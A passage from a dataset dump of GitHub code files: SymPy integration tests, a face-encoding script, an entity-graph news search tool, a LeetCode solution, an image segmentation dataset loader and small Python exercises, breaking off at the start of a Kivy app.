DifferentialExtension(extension={'D': [Poly(1, x)], 'E_K': [], 'L_K': [],\n 'E_args': [], 'L_args': []})\n assert is_log_deriv_k_t_radical(Poly(2*x, x), Poly(1, x), DE) is None\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(2*t1, t1), Poly(1/x, t2)],\n 'L_K': [2], 'E_K': [1], 'L_args': [x], 'E_args': [2*x]})\n assert is_log_deriv_k_t_radical(Poly(x + t2/2, t2), Poly(1, t2), DE) == \\\n ([(t1, 1), (x, 1)], t1*x, 2, 0)\n # TODO: Add more tests\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t0, t0), Poly(1/x, t)],\n 'L_K': [2], 'E_K': [1], 'L_args': [x], 'E_args': [x]})\n assert is_log_deriv_k_t_radical(Poly(x + t/2 + 3, t), Poly(1, t), DE) == \\\n ([(t0, 2), (x, 1)], x*t0**2, 2, 3)\n\n\ndef test_is_deriv_k():\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t1), Poly(1/(x + 1), t2)],\n 'L_K': [1, 2], 'E_K': [], 'L_args': [x, x + 1], 'E_args': []})\n assert is_deriv_k(Poly(2*x**2 + 2*x, t2), Poly(1, t2), DE) == \\\n ([(t1, 1), (t2, 1)], t1 + t2, 2)\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t1), Poly(t2, t2)],\n 'L_K': [1], 'E_K': [2], 'L_args': [x], 'E_args': [x]})\n assert is_deriv_k(Poly(x**2*t2**3, t2), Poly(1, t2), DE) == \\\n ([(x, 3), (t1, 2)], 2*t1 + 3*x, 1)\n # TODO: Add more tests, including ones with exponentials\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(2/x, t1)],\n 'L_K': [1], 'E_K': [], 'L_args': [x**2], 'E_args': []})\n assert is_deriv_k(Poly(x, t1), Poly(1, t1), DE) == \\\n ([(t1, S(1)/2)], t1/2, 1)\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(2/(1 + x), t0)],\n 'L_K': [1], 'E_K': [], 'L_args': [x**2 + 2*x + 1], 'E_args': []})\n assert is_deriv_k(Poly(1 + x, t0), Poly(1, t0), DE) == \\\n ([(t0, S(1)/2)], t0/2, 1)\n\n\ndef test_is_log_deriv_k_t_radical_in_field():\n # NOTE: any potential constant factor in the second element of the result\n # doesn't matter, because it cancels in Da/a.\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n assert is_log_deriv_k_t_radical_in_field(Poly(5*t + 1, t), Poly(2*t*x, t), DE) == \\\n (2, t*x**5)\n assert is_log_deriv_k_t_radical_in_field(Poly(2 + 3*t, t), Poly(5*x*t, t), DE) == \\\n (5, x**3*t**2)\n\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(-t/x**2, t)]})\n assert is_log_deriv_k_t_radical_in_field(Poly(-(1 + 2*t), t),\n Poly(2*x**2 + 2*x**2*t, t), DE) == \\\n (2, t + t**2)\n assert is_log_deriv_k_t_radical_in_field(Poly(-1, t), Poly(x**2, t), DE) == \\\n (1, t)\n assert is_log_deriv_k_t_radical_in_field(Poly(1, t), Poly(2*x**2, t), DE) == \\\n (2, 1/t)\n\n\ndef test_parametric_log_deriv():\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n assert parametric_log_deriv_heu(Poly(5*t**2 + t - 6, t), Poly(2*x*t**2, t),\n Poly(-1, t), Poly(x*t**2, t), DE) == \\\n (2, 6, t*x**5)\n","repo_name":"securesystemslab/zippy","sub_path":"zippy/benchmarks/src/benchmarks/sympy/sympy/integrals/tests/test_prde.py","file_name":"test_prde.py","file_ext":"py","file_size_in_byte":10926,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"75"} +{"seq_id":"35881481472","text":"import os\nimport sys\nimport pickle\nimport face_recognition\n\n# load input data from arguments\nfriendImage = face_recognition.load_image_file(sys.argv[1])\nuserPath = sys.argv[2]\nfriendId = sys.argv[3]\n\n# open existing encodings file or create new encoding dictionary\ntry: \n encodings = pickle.load(open(userPath + \"/encodings.pickle\", \"rb\"))\nexcept (OSError, IOError) as error:\n encodings = {}\n\n# create new encoding and add to dictionary\nfriendEncoding = face_recognition.face_encodings(friendImage)\nencodings[friendId] = friendEncoding[0]\n\n# write encodings dictionary out to file\noutfile = open(userPath + \"/encodings.pickle\", \"wb\")\npickle.dump(encodings, outfile)\noutfile.close()\n\n\n### Psuedocode\n# Take image on command line (argv 2)\n# Encode image with face_recognition\n# Save encoding object to variable\n# If no file then create new dictionary with encoding\n# else open pickle file, add encoding to dictionary\n# re-pickle dictionary\n# done","repo_name":"eyedoor/Server","sub_path":"face_recognition/createEncoding.py","file_name":"createEncoding.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30204513693","text":"import argparse\nimport cmd\nimport sys\nimport re\nimport os\nimport pickle\n\nfrom nltk.tokenize import StanfordTokenizer\n\n\nimport pandas as pd\nimport src.spaCy as sp\nfrom src.entity import Entity\nfrom src.document import Document\nfrom src.graph import GraphObject\nfrom src.similarity import Similarity\nfrom src.prompt import Prompt\nfrom src.query import Query\n\n#inv_map = {v: k for k, v in my_map.items()}\nclass Main:\n\n def __init__(self):\n\n self.entities = []\n self.counter_entities = 0\n self.ent2idx = {}\n self.load_equal_entities()\n\n self.documents = []\n self.counter_documents = 0\n self.amount_documents = 80000#1000\n\n self.queries = []\n self.counter_queries = 0\n\n self.spacy_instance = sp.SpaCy()\n self.similarity_object = Similarity()\n self.graph_instance = GraphObject()\n\n self.ent_doc_dataset_path = './data/ent_doc_dataset/ent_doc_dataset_path.pickle'\n\n def main(self, path_documents):\n\n self.document_files = self.load_documents(path_documents)\n\n #self.create_and_train_similarity(path_documents, similarity_object)\n\n #self.train_models(path_documents)\n\n\n self.similarity_object.load_dictionary()\n\n self.similarity_object.load_lda()\n self.similarity_object.load_lda_index()\n\n #self.show_topics(self.similarity_object.lda, 70, self.similarity_object.dictionary)\n\n\n #self.similarity_object.load_corpus()\n\n #self.similarity_object.load_tf_idf()\n #self.similarity_object.load_tf_idf_index()\n\n #self.similarity_object.tf_idf_similarity_matrix()\n #self.similarity_object.tf_idf_train()\n\n\n \"\"\"\n import time\n import sent2vec\n\n\n sentences = [\"first sentence .\", \"another sentence that I don't like so much, I'll go there Mr. Obama.\"]\n SNLP_TAGGER_JAR = os.path.join(\"./utils/stanford-postagger-full-2018-02-27/\", \"stanford-postagger.jar\")\n tknzr = StanfordTokenizer(SNLP_TAGGER_JAR, encoding='utf-8')\n s = ' '.join(sentences) #just a trick to make things faster\n tokenized_sentences_SNLP = self.tokenize_sentences(tknzr, [s])\n tokenized_sentences_SNLP = tokenized_sentences_SNLP[0].split(' ')\n assert(len(tokenized_sentences_SNLP) == len(sentences))\n print(tokenized_sentences_SNLP)\n\n model = sent2vec.Sent2vecModel()\n model.load_model('./data/models/wiki_unigrams.bin')\n emb = model.embed_sentence(\"once upon a time .\")\n t0 = time.time()\n embs = model.embed_sentences([\"first sentence .\", \"another sentence\"])\n print(time.time() - t0)\n \"\"\"\n\n #sys.exit()\n\n #for i in range(0, lda.num_topics - 1):\n # print(lda.show_topic(i))\n #documents = self.load_documents(path_documents)\n #gen_docs = similarity_object.tokenize_documents(documents['body'])\n #similarity_object.generate_corpus(gen_docs)\n #similarity_object.lda_train()\n #self.similarity_object.tf_idf_train()\n\n self.fill_dataset_and_graph()\n\n # \"\"\" UNCOMMENT\n p = Prompt(self, sys.argv[1:])\n p.cmdloop()\n\n # \"\"\"\n\n def fill_dataset_and_graph(self):\n print(\"Reading documents and finding entities.\")\n # Fill our objects\n self.fill_ent_doc_memory_database(self.document_files, load=True) # change to load or create\n\n # Fill our Neo4j Graph\n self.graph_instance.populate(self.entities, self.ent2idx, self.documents, self.queries)\n\n # If a document doesn't have entities it will not appear in the graph: NOT true anymore, because it will have similarities\n print(\"\\tAdding entities and documents to the graph.\")\n for idx, document in enumerate(self.documents):\n self.graph_instance.add_ent_to_doc(document)\n self.update_progress(idx+1, len(self.documents))\n print('\\n')\n\n print(\"\\tAdding similarities to the graph.\")\n for idx, document in enumerate(self.documents):\n self.graph_instance.add_similarity_to_doc(document)\n self.update_progress(idx+1, len(self.documents))\n print('\\n')\n\n def make_query(self, query_text):\n query_object = Query(self.counter_queries, query_text)\n entities_found = self.text_to_ent_idx(query_text)\n query_object.add_entities(entities_found)\n doc_similarities = self.find_similarities(query_text)\n query_object.add_similarities(doc_similarities)\n self.queries.append(query_object)\n self.counter_queries += 1\n self.graph_instance.add_ent_to_doc(query_object, type='QUERY')\n self.graph_instance.add_similarity_to_query(query_object, type='QUERY')\n\n print(\"SiMILARITEISASAS\", query_object.similarities)\n\n \"\"\"\n search = \"Mr. Obama and Mr. Donald J. Trump both like to eat ice-creams\"\n entities_found = self.text_to_ent_idx(search)\n response = graph_instance.find_documents_on_entities(entities_found)\n\n # print(response[0].get('labels'), response[0].get('name'))\n # print(response)\n \"\"\"\n\n # The input format of documents should be a dataframe with columns; head & body.\n # This function is meant to fill the entities and documents.\n def fill_ent_doc_memory_database(self, documents, load=True):\n print(\"\\tAdding entities, documents and similarities to our database.\")\n if load:\n\n with open(self.ent_doc_dataset_path, 'rb') as handle:\n from_pickle = pickle.load(handle)\n self.entities= from_pickle[\"entities\"]\n self.counter_entities = from_pickle[\"counter_entities\"]\n self.documents = from_pickle[\"documents\"]\n self.ent2idx = from_pickle[\"ent2idx\"]\n self.documents = from_pickle[\"documents\"]\n self.counter_documents = from_pickle[\"counter_documents\"]\n self.amount_document = from_pickle[\"amount_documents\"]\n\n else:\n if self.amount_documents > len(documents):\n self.amount_documents= len(documents)\n for idx_doc, document in documents.iterrows():\n\n if idx_doc >= self.amount_documents:\n break\n import time\n #t0 = time.time()\n # entities\n doc_entities = self.fill_ent_database(self.counter_documents, document['body']+document['head'])\n document_object = Document(self.counter_documents, document['head'], document['body'])\n document_object.add_entities(doc_entities)\n #t1 = time.time() -t0\n #print(\"time entities:\",t1 )\n #t0 = time.time()\n # similarities\n doc_similarities = self.find_similarities(document['body']+document['head'])\n document_object.add_similarities(doc_similarities)\n #print(\"time similarities:\", time.time() - t0)\n self.documents.append(document_object)\n self.counter_documents += 1\n self.update_progress(idx_doc+1, self.amount_documents)\n\n to_pickle= {\n \"entities\": self.entities,\n \"counter_entities\": self.counter_entities,\n \"documents\": self.documents,\n \"ent2idx\": self.ent2idx,\n \"documents\": self.documents,\n \"counter_documents\":self.counter_documents,\n \"amount_documents\": self.amount_documents\n }\n with open(self.ent_doc_dataset_path, 'wb') as handle:\n pickle.dump(to_pickle, handle, protocol=pickle.HIGHEST_PROTOCOL)\n print(\"The dataset has been stored in\", self.ent_doc_dataset_path)\n\n # Finds the entities of a text document and maintains coherence with the entities list.\n def fill_ent_database(self, doc_id, text):\n # Text(text) Start End Label(label_) Description\n entities = self.spacy_instance.find_entities(text)\n doc_entities = []\n for ent in entities:\n if self.is_valid_entity(ent):\n label = ent.text+'_'+ent.label_\n if (label) not in self.ent2idx:\n self.ent2idx[label] = self.counter_entities\n entity_object = Entity(self.counter_entities, ent.text, ent.label_)\n entity_object.append_document(doc_id)\n self.entities.append(entity_object)\n self.counter_entities += 1\n doc_entities.append(self.ent2idx[label])\n else:\n if doc_id not in self.entities[self.ent2idx[label]].documents:\n self.entities[self.ent2idx[label]].append_document(doc_id)\n doc_entities.append(self.ent2idx[label])\n return doc_entities\n\n def find_similarities(self, text):\n return self.similarity_object.query_to_lda(text, language='english', k=20, verbose = False)\n\n # Finds the entities of a text document (??? I DONT KNOW and maintains coherence with the entities list.)\n def text_to_ent_idx(self, text):\n # Text(text) Start End Label(label_) Description\n entities = self.spacy_instance.find_entities(text)\n doc_entities = []\n total_ent_in_database = 0\n for ent in entities:\n if self.is_valid_entity(ent):\n label = ent.text+'_'+ent.label_\n # Check if its already there in case because it could have an alias\n if (label) in self.ent2idx:\n entity = self.ent2idx[label]\n #total_ent_in_database += 1\n doc_entities.append(entity)\n else:\n print(\"Entity <\", label, \">not found in the graph\")\n return doc_entities\n\n # There are some kind of buggy entities that we will filter out.\n def is_valid_entity(self,ent):\n text = ent.text\n label = ent.label_\n if ('_' in text) or ('—' in text) or (text == \" \") or (text == \"'s\") or (text == \" \") or (text == \" \") or (text == \" \") or (text == \" \"):\n return False\n elif (label == 'PERSON') or (label == 'ORG') or (label == 'LOC') or (label == 'DOCUMENT') or (label == 'NORP') or (label == 'GPE'):\n return True\n else: return False\n\n # This is to assign multiple names of entities to a single id, e.g: D.J.Trump and Trump\n def load_equal_entities(self):\n list = []\n equal1 = ['Donald J. Trump_PERSON', 'Trump_PERSON', 'Trump_ORG', 'Trump_NORP', 'Trump_GPE']\n equal2 = ['Queen Elizabeth II_PERSON', 'Queen Elizabeth_PERSON']\n equal3 = ['Obama_PERSON', 'Obama_GPE']\n list.append(equal1)\n list.append(equal2)\n list.append(equal3)\n for equality_group in list:\n for count, equality in enumerate(equality_group):\n ent_text, ent_label = equality.split('_')\n if count == 0:\n entity_object = Entity(self.counter_entities, ent_text, ent_label)\n else:\n entity_object.append_alias(ent_text)\n self.ent2idx[equality] = self.counter_entities\n self.entities.append(entity_object)\n self.counter_entities += 1\n\n def train_models(self, path_documents):\n documents = self.load_documents(path_documents)\n gen_docs = self.similarity_object.tokenize_documents(documents['body'])\n self.similarity_object.generate_corpus(gen_docs)\n self.similarity_object.lda_train()\n self.similarity_object.tf_idf_train()\n\n # Function to load the articles.csv dataset.\n def load_documents(self, path):\n with open(path) as myCSV:\n # idx, title, publication, author, date, year, month, url, content\n data = pd.read_csv(myCSV)\n documents = data[['title', 'content']].copy()\n documents.rename(columns={'title': 'head', 'content': 'body'}, inplace=True)\n return documents\n\n def update_progress(self, count, total):\n bar_len = 60\n suffix = ''\n filled_len = int(round(bar_len * count / float(total)))\n percents = round(100.0 * count / float(total), 1)\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n sys.stdout.write('[%s] %s%s ...%s\\r' % (bar, percents, '%', suffix))\n sys.stdout.flush()\n\n def create_and_train_similarity(self, path_documents, similarity_object):\n documents = self.load_documents(path_documents)\n gen_docs = similarity_object.tokenize_documents(documents['body'])\n similarity_object.generate_corpus(gen_docs)\n similarity_object.lda()\n\n def show_topics(self,model, num_topics, dict_sim):\n for i, topic in enumerate(model.show_topics(num_topics=num_topics, formatted=False)):\n tmp_int = 1\n p_total = 0\n first = True\n for id,p in topic[1]:\n p_total += p\n if p >= 0.009:\n if first:\n print(\"Topic #\", topic[0], \":\")\n first = False\n print(str(tmp_int),\"(\",str('{0:.2f}'.format(p)),\"):\\t\",str(dict_sim[int(id)]))\n tmp_int += 1\n\n def tokenize(self, tknzr, sentence, to_lower=True):\n \"\"\"Arguments:\n - tknzr: a tokenizer implementing the NLTK tokenizer interface\n - sentence: a string to be tokenized\n - to_lower: lowercasing or not\n \"\"\"\n sentence = sentence.strip()\n sentence = ' '.join([self.format_token(x) for x in tknzr.tokenize(sentence)])\n if to_lower:\n sentence = sentence.lower()\n sentence = re.sub('((www\\.[^\\s]+)|(https?://[^\\s]+)|(http?://[^\\s]+))','',sentence) #replace urls by \n sentence = re.sub('(\\@[^\\s]+)','',sentence) #replace @user268 by \n filter(lambda word: ' ' not in word, sentence)\n return sentence\n\n def format_token(self, token):\n \"\"\"\"\"\"\n if token == '-LRB-':\n token = '('\n elif token == '-RRB-':\n token = ')'\n elif token == '-RSB-':\n token = ']'\n elif token == '-LSB-':\n token = '['\n elif token == '-LCB-':\n token = '{'\n elif token == '-RCB-':\n token = '}'\n return token\n\n def tokenize_sentences(self, tknzr, sentences, to_lower=True):\n \"\"\"Arguments:\n - tknzr: a tokenizer implementing the NLTK tokenizer interface\n - sentences: a list of sentences\n - to_lower: lowercasing or not\n \"\"\"\n return [self.tokenize(tknzr, s, to_lower) for s in sentences]\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Anemone')\n parser.add_argument('-d','--documents', help='Path to documents dataset',\n default='./data/documents/articles.csv')\n parser.add_argument(\"-l\",\"--loaddefault\", help=\"load existing database\",\n action=\"store_true\")\n args = parser.parse_args()\n m = Main()\n m.main(path_documents=args.documents)\n\n#Main()\n\n\"\"\"\ninit\nmodel\nload\npredict\n\"\"\"\n\n\"\"\"documents = {'head':\"Mr. _ and President Obama went on vacations the 1st of September.\",\n 'body':\"Hello everybody\"}\n\nfor entity in self.entities:\n if len(entity.documents) > 1:#2,3,4\n print(entity.text, entity.documents)\nfor idx in [2,3,4]:\n for text in self.documents[idx].entities:\n if 'American' in text.text:\n print(text.text)\n#print(self.documents[2].entities.text,self.documents[3].entities.text,self.documents[4].entities.text)\n\"\"\"","repo_name":"ficapal18/anemone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14179672591","text":"'''\nTwo Pointers\nT: O(N)\nS: O(N)\n\nYou are here!\nYour runtime beats 15.83 % of python3 submissions.\nYou are here!\nYour memory usage beats 48.72 % of python3 submissions.\n'''\nclass Solution:\n def reverseOnlyLetters(self, s: str) -> str:\n ss = list(s)\n l , r = 0, len(ss) - 1\n while l < r:\n while l < r and not ss[l].isalpha():\n l += 1\n while l < r and not ss[r].isalpha():\n r -= 1\n if l >= r:\n break\n ss[l], ss[r] = ss[r], ss[l]\n l += 1; r -= 1\n \n return ''.join(ss)\n","repo_name":"lixiang2017/leetcode","sub_path":"explore/2021/september/Reverse_Only_Letters.py","file_name":"Reverse_Only_Letters.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7834427886","text":"import glob\nimport json\nimport os\nimport random\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom pycocotools.coco import COCO\nfrom transformers import CLIPImageProcessor\n\nfrom model.llava import conversation as conversation_lib\nfrom model.segment_anything.utils.transforms import ResizeLongestSide\n\nfrom .utils import ANSWER_LIST, SHORT_QUESTION_LIST\n\n\ndef init_mapillary(base_image_dir):\n mapillary_data_root = os.path.join(base_image_dir, \"mapillary\")\n with open(os.path.join(mapillary_data_root, \"config_v2.0.json\")) as f:\n mapillary_classes = json.load(f)[\"labels\"]\n mapillary_classes = [x[\"readable\"].lower() for x in mapillary_classes]\n mapillary_classes = np.array(mapillary_classes)\n mapillary_labels = sorted(\n glob.glob(\n os.path.join(mapillary_data_root, \"training\", \"v2.0\", \"labels\", \"*.png\")\n )\n )\n mapillary_images = [\n x.replace(\".png\", \".jpg\").replace(\"v2.0/labels\", \"images\")\n for x in mapillary_labels\n ]\n print(\"mapillary: \", len(mapillary_images))\n return mapillary_classes, mapillary_images, mapillary_labels\n\n\ndef init_ade20k(base_image_dir):\n with open(\"utils/ade20k_classes.json\", \"r\") as f:\n ade20k_classes = json.load(f)\n ade20k_classes = np.array(ade20k_classes)\n image_ids = sorted(\n os.listdir(os.path.join(base_image_dir, \"ade20k/images\", \"training\"))\n )\n ade20k_image_ids = []\n for x in image_ids:\n if x.endswith(\".jpg\"):\n ade20k_image_ids.append(x[:-4])\n ade20k_images = []\n for image_id in ade20k_image_ids: # self.descriptions:\n ade20k_images.append(\n os.path.join(\n base_image_dir,\n \"ade20k\",\n \"images\",\n \"training\",\n \"{}.jpg\".format(image_id),\n )\n )\n ade20k_labels = [\n x.replace(\".jpg\", \".png\").replace(\"images\", \"annotations\")\n for x in ade20k_images\n ]\n print(\"ade20k: \", len(ade20k_images))\n return ade20k_classes, ade20k_images, ade20k_labels\n\n\ndef init_cocostuff(base_image_dir):\n cocostuff_classes = []\n with open(\"utils/cocostuff_classes.txt\") as f:\n for line in f.readlines()[1:]:\n cocostuff_classes.append(line.strip().split(\": \")[-1])\n cocostuff_classes = np.array(cocostuff_classes)\n cocostuff_images = []\n\n cocostuff_labels = glob.glob(\n os.path.join(base_image_dir, \"cocostuff\", \"train2017\", \"*.png\")\n )\n cocostuff_images = [\n x.replace(\".png\", \".jpg\").replace(\"cocostuff\", \"coco\") for x in cocostuff_labels\n ]\n\n print(\"cocostuff: \", len(cocostuff_images))\n return cocostuff_classes, cocostuff_images, cocostuff_labels\n\n\ndef init_paco_lvis(base_image_dir):\n coco_api_paco_lvis = COCO(\n os.path.join(\n base_image_dir, \"vlpart\", \"paco\", \"annotations\", \"paco_lvis_v1_train.json\"\n )\n )\n all_classes = coco_api_paco_lvis.loadCats(coco_api_paco_lvis.getCatIds())\n class_map_paco_lvis = {}\n for cat in all_classes:\n cat_split = cat[\"name\"].strip().split(\":\")\n if len(cat_split) == 1:\n name = cat_split[0].split(\"_(\")[0]\n else:\n assert len(cat_split) == 2\n obj, part = cat_split\n obj = obj.split(\"_(\")[0]\n part = part.split(\"_(\")[0]\n name = (obj, part)\n class_map_paco_lvis[cat[\"id\"]] = name\n img_ids = coco_api_paco_lvis.getImgIds()\n print(\"paco_lvis: \", len(img_ids))\n return class_map_paco_lvis, img_ids, coco_api_paco_lvis\n\n\ndef init_pascal_part(base_image_dir):\n coco_api_pascal_part = COCO(\n os.path.join(base_image_dir, \"vlpart\", \"pascal_part\", \"train.json\")\n )\n all_classes = coco_api_pascal_part.loadCats(coco_api_pascal_part.getCatIds())\n class_map_pascal_part = {}\n for cat in all_classes:\n cat_main, cat_part = cat[\"name\"].strip().split(\":\")\n name = (cat_main, cat_part)\n class_map_pascal_part[cat[\"id\"]] = name\n img_ids = coco_api_pascal_part.getImgIds()\n print(\"pascal_part: \", len(img_ids))\n return class_map_pascal_part, img_ids, coco_api_pascal_part\n\n\nclass SemSegDataset(torch.utils.data.Dataset):\n pixel_mean = torch.Tensor([123.675, 116.28, 103.53]).view(-1, 1, 1)\n pixel_std = torch.Tensor([58.395, 57.12, 57.375]).view(-1, 1, 1)\n img_size = 1024\n ignore_label = 255\n\n def __init__(\n self,\n base_image_dir,\n tokenizer,\n vision_tower,\n samples_per_epoch=500 * 8 * 2 * 10,\n precision: str = \"fp32\",\n image_size: int = 224,\n num_classes_per_sample: int = 3,\n exclude_val=False,\n sem_seg_data=\"ade20k||cocostuff||partimagenet||pascal_part||paco_lvis||mapillary\",\n ):\n self.exclude_val = exclude_val\n self.samples_per_epoch = samples_per_epoch\n self.num_classes_per_sample = num_classes_per_sample\n\n self.base_image_dir = base_image_dir\n self.image_size = image_size\n self.tokenizer = tokenizer\n self.precision = precision\n self.transform = ResizeLongestSide(image_size)\n self.clip_image_processor = CLIPImageProcessor.from_pretrained(vision_tower)\n\n self.short_question_list = SHORT_QUESTION_LIST\n self.answer_list = ANSWER_LIST\n\n self.data2list = {}\n self.data2classes = {}\n\n self.sem_seg_datas = sem_seg_data.split(\"||\")\n for ds in self.sem_seg_datas:\n classes, images, labels = eval(\"init_{}\".format(ds))(base_image_dir)\n self.data2list[ds] = (images, labels)\n self.data2classes[ds] = classes\n\n if \"cocostuff\" in self.sem_seg_datas:\n self.cocostuff_class2index = {\n c: i for i, c in enumerate(self.data2classes[\"cocostuff\"])\n }\n\n def __len__(self):\n return self.samples_per_epoch\n\n def preprocess(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Normalize pixel values and pad to a square input.\"\"\"\n # Normalize colors\n x = (x - self.pixel_mean) / self.pixel_std\n\n # Pad\n h, w = x.shape[-2:]\n padh = self.img_size - h\n padw = self.img_size - w\n x = F.pad(x, (0, padw, 0, padh))\n return x\n\n def __getitem__(self, idx):\n ds = random.randint(0, len(self.sem_seg_datas) - 1)\n ds = self.sem_seg_datas[ds]\n\n if ds in [\"paco_lvis\", \"pascal_part\"]:\n class_map = self.data2classes[ds]\n img_ids, coco_api = self.data2list[ds]\n idx = random.randint(0, len(img_ids) - 1)\n img_id = img_ids[idx]\n image_info = coco_api.loadImgs([img_id])[0]\n file_name = image_info[\"file_name\"]\n if ds == \"pascal_part\":\n file_name = os.path.join(\n \"VOCdevkit\", \"VOC2010\", \"JPEGImages\", file_name\n )\n image_path = os.path.join(self.base_image_dir, \"vlpart\", ds, file_name)\n elif ds == \"paco_lvis\":\n image_path = os.path.join(self.base_image_dir, \"coco\", file_name)\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # preprocess image for clip\n image_clip = self.clip_image_processor.preprocess(\n image, return_tensors=\"pt\"\n )[\"pixel_values\"][0]\n image = self.transform.apply_image(image) # preprocess image for sam\n resize = image.shape[:2]\n annIds = coco_api.getAnnIds(imgIds=image_info[\"id\"])\n anns = coco_api.loadAnns(annIds)\n if len(anns) == 0:\n return self.__getitem__(0)\n if len(anns) >= self.num_classes_per_sample:\n sampled_anns = np.random.choice(\n anns, size=self.num_classes_per_sample, replace=False\n ).tolist()\n else:\n sampled_anns = anns\n sampled_classes = []\n for ann in sampled_anns:\n sampled_cls = class_map[ann[\"category_id\"]]\n if isinstance(sampled_cls, tuple):\n obj, part = sampled_cls\n if random.random() < 0.5:\n name = obj + \" \" + part\n else:\n name = \"the {} of the {}\".format(part, obj)\n else:\n name = sampled_cls\n sampled_classes.append(name)\n\n elif ds in [\"ade20k\", \"cocostuff\", \"mapillary\"]:\n image, labels = self.data2list[ds]\n idx = random.randint(0, len(image) - 1)\n image_path = image[idx]\n label_path = labels[idx]\n label = Image.open(label_path)\n label = np.array(label)\n if ds == \"ade20k\":\n label[label == 0] = 255\n label -= 1\n label[label == 254] = 255\n elif ds == \"cocostuff\":\n for c, i in self.cocostuff_class2index.items():\n if \"-\" in c:\n label[label == i] = 255\n img = cv2.imread(image_path)\n image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # preprocess image for clip\n image_clip = self.clip_image_processor.preprocess(\n image, return_tensors=\"pt\"\n )[\"pixel_values\"][0]\n image = self.transform.apply_image(image) # preprocess image for sam\n resize = image.shape[:2]\n unique_label = np.unique(label).tolist()\n if 255 in unique_label:\n unique_label.remove(255)\n if len(unique_label) == 0:\n return self.__getitem__(0)\n\n classes = [self.data2classes[ds][class_id] for class_id in unique_label]\n if len(classes) >= self.num_classes_per_sample:\n sampled_classes = np.random.choice(\n classes, size=self.num_classes_per_sample, replace=False\n ).tolist()\n else:\n sampled_classes = classes\n\n questions = []\n answers = []\n class_ids = []\n for sampled_cls in sampled_classes:\n text = sampled_cls\n\n assert len(text.split(\"||\")) == 1\n question_template = random.choice(self.short_question_list)\n questions.append(question_template.format(class_name=text.lower()))\n\n answers.append(random.choice(self.answer_list))\n\n if ds in [\"paco_lvis\", \"pascal_part\"]:\n continue\n\n class_id = self.data2classes[ds].tolist().index(sampled_cls)\n class_ids.append(class_id)\n\n conversations = []\n conv = conversation_lib.default_conversation.copy()\n\n i = 0\n while i < len(questions):\n conv.messages = []\n conv.append_message(conv.roles[0], questions[i])\n conv.append_message(conv.roles[1], answers[i])\n conversations.append(conv.get_prompt())\n i += 1\n\n image = self.preprocess(torch.from_numpy(image).permute(2, 0, 1).contiguous())\n\n if ds in [\"paco_lvis\", \"pascal_part\"]:\n masks = []\n for ann in sampled_anns:\n try:\n masks.append(coco_api.annToMask(ann))\n except Exception as e:\n print(e)\n return self.__getitem__(0)\n\n masks = np.stack(masks, axis=0)\n masks = torch.from_numpy(masks)\n label = torch.ones(masks.shape[1], masks.shape[2]) * self.ignore_label\n\n else:\n label = torch.from_numpy(label).long()\n masks = []\n for class_id in class_ids:\n masks.append(label == class_id)\n masks = torch.stack(masks, dim=0)\n return (\n image_path,\n image,\n image_clip,\n conversations,\n masks,\n label,\n resize,\n questions,\n sampled_classes,\n )\n","repo_name":"dvlab-research/LISA","sub_path":"utils/sem_seg_dataset.py","file_name":"sem_seg_dataset.py","file_ext":"py","file_size_in_byte":12040,"program_lang":"python","lang":"en","doc_type":"code","stars":1109,"dataset":"github-code","pt":"75"} +{"seq_id":"14830743976","text":"a = int(input(\"A: \"))\nb = int(input(\"B: \"))\nc = int(input(\"C: \"))\nd = int(input(\"D: \"))\n\nadicao1 = a + b\nadicao2 = a + c\nadicao3 = a + d\nadicao4 = b + c\nadicao5 = b + d\nadicao6 = c + d\n\nmultiplicacao1 = a * b\nmultiplicacao2 = a * c\nmultiplicacao3 = a * d\nmultiplicacao4 = b * c\nmultiplicacao5 = b * d\nmultiplicacao6 = c * d\n\nprint(adicao1, adicao2, adicao3, adicao4, adicao5, adicao6, multiplicacao1, multiplicacao2, multiplicacao3, multiplicacao4, multiplicacao5, multiplicacao6)","repo_name":"rafinhao11/python_exercises","sub_path":"cap3_ex3g_pg55.py","file_name":"cap3_ex3g_pg55.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3042308476","text":"def checkMathExpr(expr):\n\tcount = 0\n\n\tfor i in expr:\n\t\tif count < -1:\n\t\t\treturn False\n\n\t\tif i == '(':\n\t\t\tcount += 1\n\n\t\tif i == ')':\n\t\t\tcount -= 1\n\n\tif count == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\nmathExpr = '((((((abccccsdfsdffsd)('\n\nprint(checkMathExpr(list(mathExpr)))","repo_name":"smenon8/AlgoDataStruct","sub_path":"practice_problems/CheckMathExpr.py","file_name":"CheckMathExpr.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29007727233","text":"from kivy.app import App\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.button import Button\nfrom kivy.lang import Builder\nfrom kivy.core.window import 